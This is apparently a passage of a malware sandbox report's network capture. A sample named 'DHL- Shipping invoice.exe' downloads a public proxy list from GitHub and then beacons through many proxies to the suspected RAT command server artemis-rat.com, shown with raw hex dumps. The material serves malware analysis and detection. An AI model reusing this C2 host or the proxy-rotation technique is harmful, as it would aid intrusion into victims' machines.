                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2152192.168.2.455673116.199.170.1741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643321991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2153192.168.2.45566772.195.34.4241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643399000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2154192.168.2.45566898.170.57.24941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643421888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2155192.168.2.454129178.33.163.15675796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643537998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.749782085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.907174110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.953166962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2156192.168.2.45410092.205.110.19492996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643636942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.749931097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2157192.168.2.45564445.238.57.136296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.643743992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2158192.168.2.454322146.19.106.59123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.649744034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2159192.168.2.454351201.71.2.2499996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.653851032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.857949972 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2160192.168.2.45438837.44.238.2534716484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.653876066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2161192.168.2.455684146.19.106.194123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.653915882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2162192.168.2.454290139.255.193.24376236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.703700066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2163192.168.2.454380148.72.212.252335166484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.728941917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.750108957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.750252962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.749871016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.749811888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2164192.168.2.45568945.61.188.134444996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.764641047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2165192.168.2.45454945.11.95.16550296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.771987915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359241009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.953495026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2166192.168.2.454404171.229.141.18240066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.809007883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.164632082 CET58INHTTP/1.1 200 Connection Established
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2167192.168.2.45569874.119.144.6041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.838192940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2168192.168.2.45448691.134.140.16091416484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.860757113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.359253883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2169192.168.2.45569345.11.95.16560046484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.869520903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2170192.168.2.45569094.20.183.172806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.896461964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2171192.168.2.455701199.102.104.7041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.917301893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2172192.168.2.455686103.200.135.22841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.919967890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2173192.168.2.455661107.152.98.541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.921761036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2174192.168.2.45461031.169.65.9010806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.941158056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2175192.168.2.455688103.164.106.7856786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.948900938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2176192.168.2.455705199.58.185.941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.952826023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2177192.168.2.455696125.228.143.20741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:12.958348036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449731140.82.112.44436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            2024-03-12 07:36:57 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                            Host: github.com
                            Connection: Keep-Alive
                            2024-03-12 07:36:57 UTC506INHTTP/1.1 200 OK
                            Server: GitHub.com
                            Date: Tue, 12 Mar 2024 07:36:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                            ETag: W/"bb12cf8b17b04e3629959a124f7cf3ad"
                            Cache-Control: max-age=0, private, must-revalidate
                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                            X-Frame-Options: deny
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 0
                            Referrer-Policy: no-referrer-when-downgrade
                            2024-03-12 07:36:57 UTC3595INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                            2024-03-12 07:36:57 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                            Data Ascii: connection: close
                            2024-03-12 07:36:57 UTC1370INData Raw: 32 32 45 43 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                            Data Ascii: 22EC<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                            2024-03-12 07:36:57 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                            Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                            2024-03-12 07:36:57 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                            Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                            2024-03-12 07:36:57 UTC1370INData Raw: 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72
                            Data Ascii: /vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendor
                            2024-03-12 07:36:57 UTC1370INData Raw: 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69
                            Data Ascii: avascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascri
                            2024-03-12 07:36:57 UTC1370INData Raw: 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 38 35 37 34 35 33 30 61 36 63 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 69 6e 69 2d 74 68 72 6f 74 74 6c
                            Data Ascii: cript" src="https://github.githubassets.com/assets/element-registry-8574530a6cd5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttl
